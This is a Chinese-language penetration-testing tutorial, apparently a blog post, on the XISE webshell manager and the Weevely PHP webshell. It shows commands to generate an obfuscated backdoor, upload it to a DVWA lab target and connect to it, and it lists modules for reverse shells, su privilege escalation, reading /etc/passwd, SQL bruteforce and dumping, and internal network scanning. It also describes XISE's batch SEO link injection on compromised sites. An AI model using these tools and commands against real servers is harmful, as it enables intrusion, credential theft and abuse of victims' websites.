文件上传漏洞(七)XISE寄生虫Weevely学习_PHP

XISE简介

XISE WBMS(寄生虫)可以看出是中国菜刀的升 级版,除了支持常规的webshell批量管理、文件 管理和数据库管理之外

支持PHP、ASP、ASPX、JSP不同环境,支持 SEO所需要的批量挂链、批量内页等功能 

支持批量导入txt和菜刀数据库,支持自动上传 shell 


操作使用

批量导入菜刀数据库 

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_02

文件管理 

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_03

自动上传shell

第一次使用右键点击添加

在已经被控制的web也可以上传自动生成的小马,自动生成的小马也会自动生成链接

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_04

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_05

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_06

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_07

Weevely

简介

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_08

Weevely是一种武器化的Web Shell,它是为了后渗tou测试而设计的。它可以在运行时通过网络对其进行扩展。使用Weevely,您可以在没有命令行访问权限的情况下管理远程Web服务器。以下是Weevely的两个用法示例:

  1. 生成Weevely PHP代理:
weevely generate <password>

这将生成一个名为weevely.php的PHP文件,您可以将其上传到目标Web服务器上。

  1. 连接Weevely PHP代理:
weevely <URL> <password> [cmd]

这将连接到目标Web服务器上的Weevely PHP代理。如果提供了可选的cmd参数,则将在连接后立即执行该命令。

除了支持shell管理之外,还支持文件管理、安全 审计、数据库管理、HTTP代理、内网渗tou

可以根据Weevely API文档,基于Python编写自己 的拓展功能 

地址为:https://github.com/epinna/weevely3

基础使用

安装weevely 

kali linux已集成,在Linux中输入Weevely就得到一下帮助命令

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_09

 

生成webshell 

weevely generate <password> <path> //加密码加路径

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_10

weevely generate pass123 ~/Desktop/hack2.php 

直接在生成shell文件到桌面 

文件上传漏洞(七)XISE寄生虫Weevely学习_php_11

这款工具只能支持PHP不能支持别的架构

查看Webshell 

cd /usr/share/weevely/ 

ls 

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_12

more hack.php 

经过混绕编码后的后门

上传Webshell 

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_13

连接webshell

weevely <URL> <password> [cmd]

weevely http://172.16.70.214/dvwa/hackable/uploads/hack.php 123456 

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_14

功能详解

help

帮助文档命令,可以看到命令提示

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_15

shell

文件上传漏洞(七)XISE寄生虫Weevely学习_php_16

:shell_php Execute PHP commands. 

:shell_sh Execute Shell  commands. 

:shell_su Elevate privileges with su command. 

:backdoor_reversetcp Execute a reverse TCP shell. 

:backdoor_tcp Spawn a shell on a TCP port. 

审计

文件上传漏洞(七)XISE寄生虫Weevely学习_php_17

:audit_phpconf Audit PHP configuration. 

:audit_suidsgid Find files with SUID or SGID flags. 

:audit_filesystem Audit system files for wrong permissions. 

:audit_etcpasswd Get /etc/passwd with different techniques. 

系统

文件上传漏洞(七)XISE寄生虫Weevely学习_php_18

:system_extensions Collect PHP and webserver extension list. 

:system_info Collect system information. 

网络

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_19

:net_phpproxy Install PHP proxy on the target. 

:net_curl Perform a curl-like HTTP request. 

:net_proxy Proxify local HTTP traffic  passing through the target. 

:net_ifconfig Get network interfaces addresses. 

:net_scan TCP Port scan. 

数据库

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_20

:bruteforce_sql Bruteforce SQL database. 

:sql_dump Multi dbms mysqldump replacement. 

:sql_console Execute SQL query or run console. 

文件

文件上传漏洞(七)XISE寄生虫Weevely学习_Web_21

:file_upload2web Upload file automatically to a web folder and get corresponding URL.

:file_upload Upload file to remote filesystem.

:file_read Read remote file from the remote filesystem.

:file_cp Copy single file.

:file_gzip Compress or expand gzip files.

:file_tar Compress or expand tar archives.

:file_enum Check existence and permissions of a list of paths.

:file_ls List directory content.

:file_check Get remote file information.

:file_find Find files with given names and attributes.

:file_download Download file to remote filesystem.

:file_rm Remove remote file.

:file_touch Change file timestamp.

:file_cd Change current working directory.

:file_webdownload Download URL to the filesystem

:file_mount Mount remote filesystem using HTTPfs.

:file_grep Print lines matching a pattern in multiple files.

:file_zip Compress or expand zip files.

:file_bzip2 Compress or expand bzip2 files.

:file_edit Edit remote file on a local  editor. 

虚拟终端

虚拟终端就和我们正常使用Linux一样

ls //查看当前文件夹

uname -a // uname -a命令用于显示所有系统信息,包括内核名称、主机名、内核版本、操作系统类型等等

pwd //pwd是一个Linux命令,用于打印当前工作目录的绝对路径。

cat /etc/passwd //cat /etc/passwd是一个Linux命令,用于查看本地系统上的用户列表。该命令将打印出一个文本文件,其中包含了系统上所有用户的用户名、用户ID、组ID、用户主目录、默认shell等信息。


信息探测 

查看系统信息 

:system_info  //查看系统核心信息

:system_extensions //查看网站安装模块和插件

查看网络信息

说明 

网络信息探测主要用于内网渗透,通过本地主机和网络信息,扫描其他服务器和开放的服务

:net_ifconfig //查看多张网卡

:net_scan  //看看局域网开放端口扫描(基于渗tou机作为跳板进行内网横向)

查看审计信息 

说明

通过审计,了解这个系统的脆弱性,例如不安全 配置、可读性文件、账号信息等 

:audit_filesystem //查看目标服务器有哪些文件是可写入的

:audit_phpconf  //PHP敏感的配置文件

:system_info  //目标操作系统信息

:system_extensions  //查看PHP、阿帕奇拓展文件和插件

网络层面可以使用net

:net_ifconfig // 可以看到网段

:net_scan //指定一个目标网段或ip地址加端口比如1-100端口,扫描开放的端口。也可以跳着写IP地址和端口号,用英文逗号隔开

文件上传漏洞(七)XISE寄生虫Weevely学习_PHP_22

文件管理 

:file_upload //本地上传文件

:file_upload2web //上传文件生成shell文件路径

:file_download  //指定肉鸡文件下载到本地

:file_read  //查看一个文件内容